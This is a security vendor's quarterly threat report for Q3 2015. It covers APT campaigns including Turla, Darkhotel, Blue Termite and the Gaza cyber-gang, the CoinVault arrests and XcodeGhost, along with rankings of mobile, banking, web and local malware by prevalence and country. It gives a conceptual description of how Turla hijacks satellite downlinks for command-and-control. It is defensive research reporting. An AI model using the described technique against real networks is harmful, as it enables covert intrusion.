Kaspersky Lab’s web antivirus detected 38,233,047 unique malicious objects: scripts, exploits, executable files, etc.
There were 5,686,755 registered notifications about attempted malware infections that aim to steal money via online access to bank accounts.
Kaspersky Lab’s file antivirus detected a total of 145,137,553 unique malicious and potentially unwanted objects.
Kaspersky Lab mobile security products detected:
1,583,094 malicious installation packages;
323,374 new malicious mobile programs;
2516 mobile banker Trojans.

Targeted attacks

Turla’s ‘eye in the sky’

We’ve written about Turla several times over the last year or so (our initial report, follow-up analysis and campaign overview can be found on securelist.com). The group behind this cyber-espionage campaign has been active for more than eight years, infecting hundreds of computers in more than 45 countries. The organizations targeted include government agencies, embassies, military, education, research and pharmaceutical companies.

The Turla group profiles its victims, using watering-hole attacks in the initial stages. However, as outlined in our latest report, for subsequent operations the group makes use of satellite communications to manage its C2 (Command-and-Control) traffic.

Most people think of satellite communications as a means of broadcasting TV, but they are also used to provide Internet access. Typically, this is done in remote locations where other types of Internet access are slow, unstable or unavailable. One of the most widespread and least expensive means of obtaining satellite-based access is through a downstream-only connection.

Turla gang turns to satellites for #cybercrime #KLRreport
The method used by Turla to hijack downstream satellite links does not require a valid satellite Internet subscription. The key benefit is that it’s anonymous – it’s very hard to identify the attackers. The satellite receivers can be located anywhere within the area covered by the satellite (typically a wide area) and the true location and hardware of the C2 server can’t be easily identified or physically seized. It’s also cheaper than purchasing a satellite-based link and easier than hijacking traffic between the victim and the satellite operator and injecting packets along the way.

In order to attack satellite-based Internet connections, both the legitimate users of these links, as well as the attackers’ own satellite dishes, point to the specific satellite that is broadcasting the traffic. The attackers exploit the fact that packets are unencrypted. Once an IP address that is routed through the satellite’s downstream link has been identified, the attackers start listening for packets coming from the Internet to this specific IP. Once a packet has been identified, they identify the source and spoof a reply packet back to the source using a conventional Internet line. At the same time, the legitimate user of the link just ignores the packet as it goes to an otherwise unused port (for instance, port 80 or 10080). You can find a graphical explanation of how Turla uses satellite links here.

The Turla group tends to focus on satellite Internet providers located in the Middle East and Africa, including Congo, Lebanon, Libya, Niger, Nigeria, Somalia and the UAE. Satellite broadcasts from these countries don’t normally cover European and North American countries, making it very hard for security researchers to investigate such attacks.

IT threat evolution in Q3 2015

The use of satellite-based Internet links is an interesting development. The hijacking of downstream bandwidth is cheap (around $1,000 for the initial investment and around $1,000 per year in maintenance), easy to do and offers a high degree of anonymity. On the downside, it’s not always as reliable as more traditional methods such as bullet-proof hosting, multiple proxy levels and hacked web sites – all of which Turla also uses. This makes it less likely that it will be used to maintain extensive botnets. Nevertheless, if this method becomes widespread among APT groups or cybercriminals, it will pose a serious problem for the IT security industry and law enforcement agencies.

Darkhotel extends its ‘guest’ list

In November 2014, we reported on the Darkhotel APT. These attacks were characterized by the misuse of stolen certificates, the deployment of HTA files using multiple methods and the infiltration of hotel Wi-Fi networks to place backdoors on targets’ computers.

Recently we published an update on Darkhotel. While the attackers behind this APT continue to use the above methods, they have also supplemented their armoury. They have shifted their attention more towards spear-phishing of their chosen victims. As well as using HTA files, they are also deploying infected RAR files, using the RTLO (right to left override) mechanism to mask the real extension of the file. The attackers also use Flash exploits, including a zero-day exploit leaked as a result of the Hacking Team security breach.

In 2015, Darkhotel extended its geographic reach, to include victims in North Korea, Russia, South Korea, Japan, Bangladesh, Thailand, India, Mozambique and Germany.

Blue Termite

In August, we reported on the Blue Termite APT, a targeted attack campaign focused on stealing information from organizations in Japan. These include government agencies, local government bodies, public interest groups, universities, banks, financial services, as well as companies working in sectors such as energy, communication, heavy industry, chemical, automotive, electrical, news media, information services, health care, real estate, food, semiconductor, robotics, construction, insurance, transportation, and more. One of the most high profile targets was the Japan Pension Service.

IT threat evolution in Q3 2015

The malware is customized according to the specific victim. The Blue Termite backdoor stores data about itself – including C2, API name, strings for anti-analysis, values of mutexes, as well as the MD5 checksum of backdoor commands and the internal proxy information. The data are stored in encrypted form, making analysis of the malware more difficult – a unique decryption key is required for each sample.

The main method of infection, as with so many targeted attack campaigns, is via spear-phishing e-mails. However, we have detected other methods of infection. These include drive-by downloads using a Flash exploit (CVE-2015-5119) – one of the exploits leaked following the Hacking Team security breach. Several Japanese web sites were compromised this way. We also found some watering-hole attacks, including one on a web site belonging to a prominent member of the Japanese government.

Malware stories

End of the line for CoinVault?

On 14 September 2015, Dutch police arrested two men for suspected involvement in CoinVault ransomware attacks, following a joint effort by Kaspersky Lab, Panda Security and the Dutch National High Tech Crime Unit (NHTCU) – highlighting the benefit of collaboration between police and security researchers. This malware campaign started in May 2014 and continued into this year, targeting victims in more than 20 countries, with the majority of victims in the Netherlands, Germany, the United States, France and Great Britain. They successfully encrypted files on more than 1,500 Windows-based computers, demanding payment in bitcoin to decrypt data on victims’ machines.

The cybercriminals responsible for this ransomware campaign modified their creations several times to keep on targeting new victims. We published our first analysis of CoinVault in November 2014, soon after the first sample of the malicious program appeared. The campaign then stopped until April 2015, when we found a new sample. In the same month, Kaspersky Lab and the Dutch NHTCU launched a web site to act as a repository of decryption keys. In addition, we also made available online a decryption tool to help victims recover their data without having to pay the ransom.

Arrests made in #CoinVault #ransomware attacks by Dutch Authorities with assist from @Kaspersky #KLReport
After publishing the site, Kaspersky Lab was contacted by Panda Security, which had found information about additional malware samples. We were able to confirm that the samples were related to CoinVault. We passed this information to the Dutch NHTCU.

You can find our analysis of the twists and turns employed by the CoinVault authors here.

Ransomware has become a notable fixture of the threat landscape. While this case shows that collaboration between researchers and law enforcement agencies can lead to positive results, it’s essential for consumers and businesses alike to take steps to mitigate the risks of this type of malware. Ransomware operations rely on their victims paying up. On top of anti-malware protection, it’s important to make regular backups of data, to avoid data loss and the need to make such ransom payments.

A serpent in Apple’s walled garden

The recent appearance of malicious apps in the App Store has made it clear that, contrary to what many people believe, iOS is not immune to malware.

The malware, called ‘Xcodeghost’, infected dozens of apps, including WeChat, NetEase’s music download app, business card scanner CamCard and Didi Kuadi’s car-hailing app. The Chinese versions of Angry Birds 2 were also infected.

The attackers didn’t hack the App Store, but hosted a malicious version of Apple’s Xcode. Xcode is a free suite of tools used by software developers to create iOS apps. It is officially distributed by Apple, but also unofficially by third parties: someone in China hosted a version of Xcode that contained XcodeGhost. Some Chinese developers choose to download development tools such as this from local servers because it is much quicker.

Any apps created using the modified version of Xcode would be infected. The infected apps steal data from their victims and send it to the attackers. It was initially believed that 39 infected apps had bypassed Apple’s scanning process and had been successfully uploaded to the App Store. Infected apps have been removed by Apple. However, the compromised version of Xcode has been available for around six months, so the total number of infected apps could be much higher, not least because the source code for XcodeGhost has been published on Github.

You can find an analysis of XcodeGhost by researchers at Palo Alto Networks here.

The incident highlights the danger of programs being infected at source if tools used by developers are compromised.

The Gaza cyber-gang

At the end of September we reported on the activities of another regional APT, the Gaza cyber-gang. This is a politically motivated Arabic group operating in the MENA region (Middle East and North Africa) – mainly focused on Egypt, the UAE and Yemen. The group is interested in government agencies – especially embassies, where security and IT operations might not be well-established or reliable. The Gaza cyber-gang has been active since 2012, but became particularly active in the second quarter of 2015.

The gang actively sends malware to IT and Incident Response (IR) staff in target organizations: the file names they use reflect IT functions and IR tools used to investigate cyber-attacks. It’s not hard to work out why. IT staff typically have greater access rights than other employees, because it’s their job to manage the corporate infrastructure. IR employees are likely to have access to sensitive data related to ongoing cyber-investigations, as well as extended access rights to help them look for suspicious activities across the network. This means the attackers not only gain access to the target organization but also extend their reach across the network.

The main infection modules used by the group are widely used remote access Trojans (RATs): XtremeRAT and PoisonIvy. Their activities are heavily reliant on social engineering. They use filenames related to IT and IR functions and content and domain names that are likely to be of interest to their victims (e.g. ‘.gov.uae.kim’).


All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity.

Mobile threats

Displaying adverts to users is still the main method of making money from mobile threats. The number of programs displaying intrusive advertising on mobile devices (adware) continued to grow in the third quarter and accounted for more than half of all detected mobile objects.

We have also observed a growing number of programs that use advertising as the main monetization method while also using other methods from the virus writers’ arsenal. They often root the device of a victim and use superuser privileges, making it very difficult, if not impossible, to combat them. In Q3 2015, these Trojans accounted for more than half of the Top 20 most popular mobile malware.

In Q3, @Kaspersky mobile security products detected 323,374 new malicious mobile programs #klreport
SMS Trojans are still relevant as a monetization method, especially in Russia. These programs send paid messages from an infected device without the user’s knowledge. Although their overall traffic share among mobile threats continues to fall, the malicious mobile Trojan-SMS still leads in terms of the number of new samples detected in the third quarter.

The pursuit of profit is not limited to displaying adverts or sending paid text messages – cybercriminals are also very interested in users’ bank accounts. In Q3 2015, the total share of mobile bankers and spyware designed to steal personal information exceeded that of SMS Trojans in new mobile malware traffic by 0.7 p.p.

The number of new mobile threats

In Q3 2015, Kaspersky Lab mobile security products detected 323,374 new malicious mobile programs – a 1.1-fold increase on Q2 2015 and a 3.1-fold increase on Q1.

The number of malicious installation packages detected was 1,583,094 – this is 1.5 times more than in the previous quarter.

IT threat evolution in Q3 2015

Number of malicious installation packages and new malicious mobile programs detected
(Q1 2015 – Q3 2015)

Distribution of mobile malware by type

IT threat evolution in Q3 2015

Distribution of new mobile malware by type, Q2 and Q3 2015

Potentially unwanted advertising programs (adware) headed the ranking of detected objects for mobile devices in Q3 2015. In the previous quarter this category of programs occupied second place with 19%; in Q3 their share grew considerably and reached 52.2%.

Second came RiskTool. The programs in this category are legitimate applications that are potentially dangerous for users – if used carelessly or manipulated by a cybercriminal, they could lead to financial losses. RiskTool was knocked off top spot after its share decreased by 16.6 p.p. from the previous quarter.

The percentage of SMS Trojans in the overall flow of mobile threats decreased by another 1.9 p.p. and amounted to 6.2%. Despite this, they are still among the leading mobile malicious programs.

SMS Trojans were followed by Spy Trojans (5.4%). These programs steal personal data from users, including incoming text messages (mTANs) from banks.

Q3 2015, @kaspersky detected 2,516 #mobile banker Trojans, which is a 4X increase on the previous quarter #KLReport
In the third quarter of 2015, the biggest growth rates were demonstrated by Trojan-Banker whose share more than doubled and accounted for 1.5% compared to 0.6% in the previous quarter. In Q2, 630 of these programs were detected, while Q3 saw their number increase four-fold and exceed 2500.

Top 20 malicious mobile programs

Please note that the ranking of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware.

Name % of attacked users*
1 DangerousObject.Multi.Generic 46.6
2 Trojan.AndroidOS.Rootnik.d 9.9
3 Trojan-SMS.AndroidOS.Podec.a 7.4
4 Trojan-Downloader.AndroidOS.Leech.a 6.0
5 Trojan.AndroidOS.Ztorg.a 5.5
6 Exploit.AndroidOS.Lotoor.be 4.9
7 Trojan-Dropper.AndroidOS.Gorpo.a 3.3
8 Trojan-SMS.AndroidOS.Opfake.a 3.0
9 Trojan.AndroidOS.Guerrilla.a 2.9
10 Trojan-SMS.AndroidOS.FakeInst.fz 2.6
11 Trojan-Ransom.AndroidOS.Small.o 2.3
12 Trojan-Spy.AndroidOS.Agent.el 2.1
13 Trojan.AndroidOS.Ventica.a 1.9
14 Trojan.AndroidOS.Ztorg.b 1.9
15 Trojan.AndroidOS.Ztorg.pac 1.8
16 Trojan.AndroidOS.Fadeb.a 1.6
17 Trojan-SMS.AndroidOS.Smaps.a 1.5
18 Trojan.AndroidOS.Iop.a 1.5
19 Trojan.AndroidOS.Guerrilla.b 1.5
20 Trojan-SMS.AndroidOS.FakeInst.fi 1.4
* Percentage of users attacked by the malware in question, relative to all users attacked.

The top position in the rankings was occupied by DangerousObject.Multi.Generic (46.6%). This is how new malicious applications are detected by the KSN cloud technologies, which help our products to significantly shorten the response time to new and unknown threats. The proportion of DangerousObject.Multi.Generic increased almost three-fold: from 17.5% in Q2 to 46.6% in Q3.

The number of Trojans that use advertising as the main means of monetization significantly increased from the previous quarter. In the second quarter of 2015 this Top 20 included six of these programs, while in Q3 their number increased to 11: three programs belong to the Trojan.AndroidOS.Ztorg family, and two each belong to the Trojan.AndroidOS.Guerrilla, Trojan.AndroidOS.Rootnik.d, Trojan-Downloader.AndroidOS .Leech.a, Trojan-Dropper.AndroidOS.Gorpo.a, Trojan-Spy.AndroidOS.Agent.el, Trojan.AndroidOS.Ventica.a and Trojan.AndroidOS.Fadeb.a families.

Unlike the usual advertising modules, these programs do not contain any useful functionality. Their goal is to deliver as many adverts as possible to the recipient using a variety of methods, including the installation of new advertising programs. These Trojans can use superuser privileges to conceal their presence in the system folder, from where it will be very difficult to remove them.

Of special note is Trojan-Spy.AndroidOS.Agent.el, which is even encountered in the official firmware of some developers.

Trojan-SMS.AndroidOS.Podec.a (7.4%) has been among the Top 3 malicious mobile programs for four quarters in a row due to how actively it is spread. It is worth mentioning that the functionality of the latest versions of this Trojan has changed and no longer includes the sending of text messages. The Trojan is now fully focused on paid subscriptions, making use of CAPTCHA recognition.

Seventeenth place is occupied by Trojan-SMS.AndroidOS.Smaps.a. Some of its versions are able to send spam upon receiving a command from the server via the Viber app if it is installed on the victim’s device. No special permission or actions on the part of the user are required by the Trojan to do this.

The geography of mobile threats

IT threat evolution in Q3 2015

The geography of mobile malware infection attempts in Q3 2015 (percentage of all users attacked)

Top 10 counties attacked by mobile malware (ranked by percentage of users attacked)

Country* % of users attacked **
1 Bangladesh 22.57
2 China 21.45
3 Nigeria 16.01
4 Tanzania 15.77
5 Iran 13.88
6 Malaysia 13.65
7 Algeria 12.73
8 Nepal 12.09
9 Kenya 11.17
10 Indonesia 10.82
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab’s mobile security product in the country.

Most secure country v. #Mobile #Malware Japan (1.13%) Where does your country rank? #KLReport
The most secure countries in this respect are:

Country % of users attacked **
1 Japan 1.13
2 Canada 2.87
3 Denmark 3.20
4 Sweden 3.45
5 Australia 3.48
Although Australia is included in the Top 5 most secure countries, when it comes to mobile malware infections the situation is not as safe as would be expected: in the third quarter of 2015, users in Australia were attacked by mobile banker Trojans more often than users in other countries (see below.).

Mobile banker Trojans

In Q3 2015, we detected 2,516 mobile banker Trojans, which is a four-fold increase on the previous quarter.

IT threat evolution in Q3 2015

Number of mobile banker Trojans detected by Kaspersky Lab’s solutions (Q4 2014 – Q3 2015)

IT threat evolution in Q3 2015

Geography of mobile banking threats in Q3 2015 (number of users attacked)

The number of attacked users depends on the overall number of users within each individual country. To assess the risk of a mobile banker Trojan infection in each country, and to compare it across countries, we made a country ranking according to the percentage of users attacked by mobile banker Trojans.

Top 10 counties attacked by mobile banker Trojans (ranked by percentage of users attacked)

Country* % of users attacked by mobile bankers**
1 Australia 0.85
2 Republic of Korea 0.40
3 Russia 0.32
4 Cyprus 0.32
5 Czech Republic 0.31
6 Austria 0.27
7 Kyrgyzstan 0.26
8 Bulgaria 0.24
9 Romania 0.23
10 Uzbekistan 0.23
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab’s mobile security product in the country.

Australia, which was ranked eighth in the previous quarter, took the lead in Q3 2015. The percentage of users attacked by mobile bankers in Australia increased six-fold (from 0.14% to 0.85%). Such significant growth was caused by fraudsters making active use of Trojan-Banker.AndroidOS.Agent.ad. This Trojan steals credentials used to enter the online banking system of one of Australia’s largest banks. It also tries to steal users’ credit card details (cardholder’s name, card number, CVV, card expiry date).

At the same time, Korea, which topped the Q2 rating, saw its share decrease six-fold (from 2.37% to 0.4%) and dropped to second place in the ranking.

Top 10 countries by the percentage of users attacked by mobile bankers relative to all attacked users

An indication of how popular mobile banker Trojans are with cybercriminals in each country can be provided by the percentage of users who were attacked at least once by mobile banker Trojans during the quarter, relative to all users in the same country whose mobile security product was activated at least once in the reporting period. This ranking differs from the one above:

Country* % of users attacked by mobile bankers, relative to all attacked users **
1 Australia 24.31
2 Austria 7.02
3 Montenegro 5.92
4 Republic of Korea 5.69
5 France 5.66
6 Cyprus 5.56
7 Russia 5.09
8 Czech Republic 4.98
9 Sweden 4.81
10 Finland 4.56
* We eliminated countries from this ranking where the number of users of Kaspersky Lab’s mobile security product is lower than 10,000.
** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all unique users attacked by mobile malware in the country.

In Australia, which topped the ranking, slightly less than a quarter of all users attacked by mobile malware were targeted by mobile bankers.

The share of bankers among all mobile malware attacks in Russia halved – from 10.35% to 5.09%. This was due to a significant drop in the activity of the Trojan-Banker.AndroidOS.Marcher family which was one of the most popular in the country. In the third quarter the number of attacks using this malware fell almost ten-fold compared to the previous quarter.

Vulnerable applications used by cybercriminals

The ranking of vulnerable applications below is based on information about the exploits blocked by our products. These exploits were used by cybercriminals in Internet attacks and in attempts to compromise local applications, including those installed on mobile devices.

IT threat evolution in Q3 2015

Distribution of exploits used in attacks by type of application attacked, Q3 2015

Compared to Q2 2015, the following changes have taken place:

The proportion of Adobe Flash Player exploits has risen by 2 percentage points (p.p.).
The proportion of Adobe Reader exploits has decreased by 5 p.p.
In Q3, just like the rest of the year, exploits for Adobe Flash Player were in demand. Their share was only 5%, but there are more of them ‘in the wild’ and at the current time nearly all exploit packs are using vulnerabilities in this software. As was the case in the previous quarter, the share of Java exploits (11%) has continued to decrease in Q3. We have not observed any exploits for this software included in recent exploit packs.

In Q3, the most common exploit packs included exploits for the following vulnerabilities:

CVE-2015-5560 (Adobe Flash; this exploit was described in a Kaspersky Lab article)
CVE-2015-2419 (Internet Explorer)
CVE-2015-1671 (Silverlight)
The previous quarter saw a dramatic increase in the number of spam messages containing malicious PDF documents. This quarter, the number of these messages decreased significantly, so the proportion of Adobe Reader exploits also decreased.

The overall trend so far for 2015 has continued in Q3: exploits for Adobe Flash Player and Internet Explorer are most popular with cybercriminals. In the pie chart above, the latter falls into the ‘Browsers’ category; the landing pages from which the exploits spread are also classified here.

Online threats (Web-based attacks)

The statistics in this section were derived from web antivirus components that protect users from attempts to download malicious objects from a malicious/infected website. Malicious websites are created deliberately by malicious users; infected sites include those with user-contributed content (such as forums), as well as compromised legitimate resources.

Online threats in the banking sector

These statistics are based on the detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

In Q3 2015, Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on the 625,669 computers. This number is 17.2 p.p. lower than in Q2 2015 (755,642). A year ago, in Q3 2014 this number was 591,688.

Kaspersky Lab’s solutions produced a total of 5,686,755 notifications about attempted malware infections aimed at stealing money via online access to bank accounts in Q3 2015.

IT threat evolution in Q3 2015

Number of attacks by financial users, Q3 2015

Geography of attacks

To evaluate and compare the degree of risk of being infected by banking Trojans which user computers are exposed to worldwide, we calculate the percentage of Kaspersky Lab product users who encountered this type of threat during the reporting period in the country, relative to all users of our products in the county.

IT threat evolution in Q3 2015

Geography of banking malware attacks in Q3 2015 (percent of attacked users)

Top 10 countries by the percentage of attacked users

Country* % attacked users**
1 Austria 4.98
2 Singapore 4.23
3 Turkey 3.04
4 Namibia 2.91
5 New Zealand 2.86
6 Hong Kong 2.81
7 Australia 2.78
8 Lebanon 2.60
9 United Arab emirates 2.54
10 Switzerland 2.46
* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (less than 10,000).
** Unique users whose computers have been targeted by web attacks as a percentage of all unique users of Kaspersky Lab products in the country.

In Q3 2015, Austria became the leader in terms of the percentage of Kaspersky Lab users who were attacked by banking Trojans. Singapore, last quarter’s leader, is now in second place. It should be noted that most countries in the Top 10 have significant numbers of online banking users, and this attracts the cybercriminals.

In Russia, 0.71% of users encountered a banking Trojan at least once in Q3; this number is little different from the Q2 figure of 0.75%. In the US, the figure was 0.59%, which is 0.3 p.p. lower than in Q2. The countries of Western Europe also saw a small decrease in the percentages of users attacked by banking malware compared to Q2: Spain stood at 1.95%, or 0.07 p.p. less than in Q2; the UK (1.24%) was down 0.34 p.p.; Italy (1.16%) saw a decrease of 0.41 p.p.; while Germany (1.03%) was 0.13 p.p. lower.

The Top 10 banking malware families

The table below shows the Top 10 malware families most commonly used in Q3 2015 to attack online banking users:

Name* Percentage of attacks**
1 Trojan-Downloader.Win32.Upatre 63.13
2 Trojan-Spy.Win32.Zbot 17.86
3 Trojan-Banker.JS.Agent 1.70
4 Trojan-Banker.Win32.ChePro 1.97
5 Backdoor.Win32.Caphaw 1.14
6 Trojan-Banker.Win32.Banbra 1.93
7 Trojan-Banker.AndroidOS.Faketoken 0.90
8 Trojan-Banker.AndroidOS.Agent 0.57
9 Trojan-Banker.Win32.Tinba 1.93
10 Trojan-Banker.AndroidOS.Marcher 0.55
*These statistics are based on the detection verdicts returned by Kaspersky Lab’s products, received from users of Kaspersky Lab products who have consented to provide their statistical data.
**Unique users whose computers have been targeted by the malicious program, as a percentage of all unique users targeted by financial malware attacks.

The majority of the Top 10 malicious programs work by injecting random HTML code in the web page displayed by the browser and intercepting any payment data entered by the user in the original or inserted web forms.

The Trojan-Downloader.Win32.Upatre family of malicious programs remains at the top of the ranking. The malware is no larger than 3.5 KB in size, and is limited to downloading the payload to the victim computer, most typically a banker Trojan from the Dyre/Dyzap/Dyreza family. The first malicious program from this family was detected in June 2014, and its main aim is to steal the user’s payment details. Dyre does this by intercepting the data from a banking session between the victim’s browser and the online banking web app. In the summer of 2015, however, Trojan-Downloader.Win32.Upatre was spotted on compromised home routers, which is a testimony to how cybercriminals make use of this multiple-purpose malware.

Trojan-Spy.Win32.Zbot, in second place, has become a permanent resident of this ranking, and it is no coincidence that it consistently occupies a leading position. The Trojans of the Zbot family were among the first to use web injections to compromise the payment details of online banking users and to modify the contents of banking web pages. They encrypt their configuration files at several levels; the decrypted configuration file is never stored in the memory in its entirety, but is instead loaded in parts. This gives the Trojans of the Trojan-Spy.Win32.Zbot family a technological edge over other malware programs.

Third place in the Q3 ranking was occupied by the Trojan-Banker.JS.Agent family. This is the malicious JavaScript code that results from an injection into an online banking page. The aim of this code is to intercept payment details that the user enters into online banking forms.

Of particular interest is the fact that three families of mobile banking Trojans are present in this ranking: Trojan-Banker.AndroidOS.Faketoken, Trojan-Banker.AndroidOS.Marcher (we wrote about these two in in the Q2 report), and a newcomer to this ranking – Trojan-Banker.AndroidOS.Agent. The malicious programs belonging to the latter family steal payment details from Android devices.

The Top 10 operating systems attacked by banker Trojans

In Q3, users of Windows operating systems encountered the largest number of financial malware attacks (which comes as no surprise given how widespread Windows devices are). That said, users of Windows 7 x64 Edition encountered banking Trojans more often, accounting for 42.2% of all banking Trojan attacks. Android also made it into the list of attacked operating systems.

Operating system Percentage of attacks*
Windows 7 x64 Edition 42.2
Windows 7 11.6
Windows 7 Home x64 Edition 5.5
Windows XP Professional 7.0
Windows 8.1 Home x64 Edition 3.7
Windows 8.1 x64 Edition 2.3
Windows 7 Home 1.3
Windows 10 x64 Edition 1.2
Android 4.4.2 0.6
Windows NT 6.3 x64 Edition 0.7
*These percentage numbers are relative to all financial malware attacks detected on the computers of unique users who have consented to provide their statistical data.

It should be noted that although the family of Mac OS X operating systems did not make it to the Top 10, users of this operating system should not see themselves as being immune: in Q3 2015, computers running under Mac OS X were attacked 12,492 times.

TOP 20 malicious objects detected online

In the third quarter of 2015, Kaspersky Lab’s web antivirus detected 38,233,047 unique malicious objects (scripts, exploits, executable files, etc.) and reported 75,408,543 unique URLs as malicious.

In Q3 2015, @Kaspersky Lab's web antivirus detected 38,233,047 unique malicious objects #KLReport
Of all malicious or potentially unwanted objects, we identified the 20 most active. These 20 accounted for 95% of all attacks on the Internet.

Top 20 malicious objects detected online

Name* % of all attacks**
1 Malicious URL 53.63
2 AdWare.JS.Agent.bg 16.71
3 AdWare.Script.Generic 7.14
4 Trojan.Script.Generic 6.30
5 Trojan.Script.Iframer 3.15
6 Trojan.Win32.Generic 1.52
7 AdWare.Win32.SoftPulse.heur 1.31
8 AdWare.JS.Agent.bt 1.09
9 AdWare.Win32.OutBrowse.heur 0.84
10 Trojan-Downloader.Win32.Generic 0.63
11 AdWare.NSIS.Vopak.heur 0.46
12 Exploit.Script.Blocker 0.46
13 Trojan-Downloader.JS.Iframe.diq 0.30
14 AdWare.Win32.Amonetize.aqxd 0.30
15 Trojan-Downloader.Win32.Genome.tqbx 0.24
16 AdWare.Win32.Eorezo.abyb 0.23
17 Hoax.HTML.ExtInstall.a 0.19
18 Trojan-Clicker.HTML.Iframe.ev 0.17
19 AdWare.Win32.Amonetize.bgnd 0.15
20 Trojan.Win32.Invader 0.14
* These statistics represent the detection verdicts of the web antivirus module. Information was provided by users of Kaspersky Lab products who consented to share their local statistical data.
** The percentage of all web attacks recorded on the computers of unique users.

The Top 20 is largely made up of verdicts assigned to objects used in drive-by attacks, as well as adware programs. This quarter, adware verdicts occupied nine positions in this ranking.

Of interest is the verdict Hoax.HTML.ExtInstall.a, assigned to a web page which blocks the browser and urges the user to install a Chrome extension. When the user tries to close the page, the voice file ‘voice.mp3’ is often played – “Click on the ‘Add’ button to close this page”.

IT threat evolution in Q3 2015

Web page urging users to install a Chrome extension
(translation: “Press ‘Add’ to continue”)

The extensions that are offered do not cause any harm to users. However, the prompt is very intrusive and it is practically impossible for the user to reject it. This is why Kaspersky Lab products detect the corresponding web page with its popup window as malicious. There is a partnership program that uses this method to distribute the extension.

Top 10 countries where online resources are seeded with malware

The following statistics are based on the physical location of the online resources that were used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks.

In order to determine the geographical source of web-based attacks, domain names are matched up against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

The #USA is top country with malicious web-based attack resources in Q3 #KLReport
In Q3 2015, Kaspersky Lab solutions blocked 235,415,870 attacks launched from web resources located in various countries around the world. 80% of notifications on blocked web attacks were triggered by attacks coming from web resources located in 10 countries.

IT threat evolution in Q3 2015

Distribution of web attack sources by country, Q3 2015

Q3 saw the US take over first place (with 26.9%) from Russia (18.8%). The Virgin Islands and Singapore have fallen out of the Top 10, while there are two newcomers – Sweden (1.43%) and Canada (1.42%).

Countries where users faced the greatest risk of online infection

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provide an indication of the aggressiveness of the environment in which computers work in different countries.

Country* % of unique users attacked**
1 Russia 38.20
2 Nepal 36.16
3 Kazakhstan 33.79
4 Ukraine 33.55
5 Syria 32.10
6 Azerbaijan 32.01
7 Belarus 30.68
8 Vietnam 30.26
9 China 27.82
10 Thailand 27.68
11 Armenia 27.65
12 Brazil 26.47
13 Algeria 26.16
14 Turkey 25.13
15 Mongolia 25.10
16 Kyrgyzstan 23.96
17 Macedonia 23.84
18 Lithuania 23.59
19 Bangladesh 23.56
20 Moldavia 23.36
These statistics are based on the detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data.

*These calculations excluded countries where the number of Kaspersky Lab users is relatively small (fewer than 10,000 users).
**Unique users whose computers have been targeted by web attacks as a percentage of all unique users of Kaspersky Lab products in the country.

The leader of this ranking remained unchanged – it is still Russia with 38.2%. Since the previous quarter, Georgia, Croatia, Qatar, Bosnia and Herzegovina and Greece have left the Top 20. Newcomers to the ranking are Nepal, which went straight in at number two (36.16%), Brazil in 12th place (26.47%), Turkey in 14th (25.13%), Lithuania in 18th (23.59%), and Bangladesh (23.56%) in 19th.

23.4% of computers connected to the Internet globally were subjected to at least one web attack during Q3 #KLReport
The countries with the safest online surfing environments included Switzerland (17%), the Czech Republic (16%), the US (16.3%), Singapore (15%), Hungary (13.8%), Norway (13%), Ireland (12.2%), and Sweden (10.8%).

IT threat evolution in Q3 2015

On average, 23.4% of computers connected to the Internet globally were subjected to at least one web attack during the three months. This is a 0.5 p.p. decrease on Q2.

Local threats

Local infection statistics for users computers are a very important indicator: they reflect threats that have penetrated computer systems using means other than the Internet, email, or network ports.

Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q3 2015, Kaspersky Lab’s file antivirus modules detected 145,137,553 unique malicious and potentially unwanted objects.

Top 20 malicious objects detected on user computers

Name* % of unique users attacked**
1 DangerousObject.Multi.Generic 19.76
2 Trojan.Win32.Generic 14.51
3 Trojan.WinLNK.StartPage.gena 5.56
4 WebToolbar.JS.Condonit.a 4.98
5 AdWare.Script.Generic 4.97
6 WebToolbar.Win32.Agent.azm 4.48
7 RiskTool.Win32.GlobalUpdate.dx 3.63
8 WebToolbar.JS.AgentBar.e 3.63
9 WebToolbar.JS.CroRi.b 3.32
10 Downloader.Win32.Agent.bxib 3.20
11 AdWare.Win32.OutBrowse.heur 3.13
12 Adware.NSIS.ConvertAd.heur 3.08
13 AdWare.Win32.Generic 3.06
14 Downloader.Win32.MediaGet.elo 2.98
15 Trojan.Win32.AutoRun.gen 2.92
16 AdWare.Win32.BrowseFox.e 2.91
17 WebToolbar.Win32.MyWebSearch.si 2.82
18 AdWare.Win32.MultiPlug.heur 2.66
19 Virus.Win32.Sality.gen 2.61
20 RiskTool.Win32.BackupMyPC.a 2.57
*These statistics are compiled from malware detection verdicts generated by the on-access and on-demand scanner modules on the computers of those users running Kaspersky Lab products who have consented to submit their statistical data.
**The proportion of individual users on whose computers the antivirus module detected these objects as a percentage of all individual users of Kaspersky Lab products on whose computers a file antivirus detection was triggered.

In line with the established practice, this ranking represents the verdicts assigned to adware programs or their components, and to worms distributed on removable drives.

The only virus in the rankings – Virus.Win32.Sality.gen – continues to lose ground. The proportion of user machines infected by this virus has been diminishing for a long time. In Q3 2015, Sality was in 19th place with 2.61%, which is a 0.25 p.p. decrease on Q2.

Countries where users faced the highest risk of local infection

For each of the countries, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus had been triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

Top 20 countries with the highest levels of computer infection

Country* % of unique users**
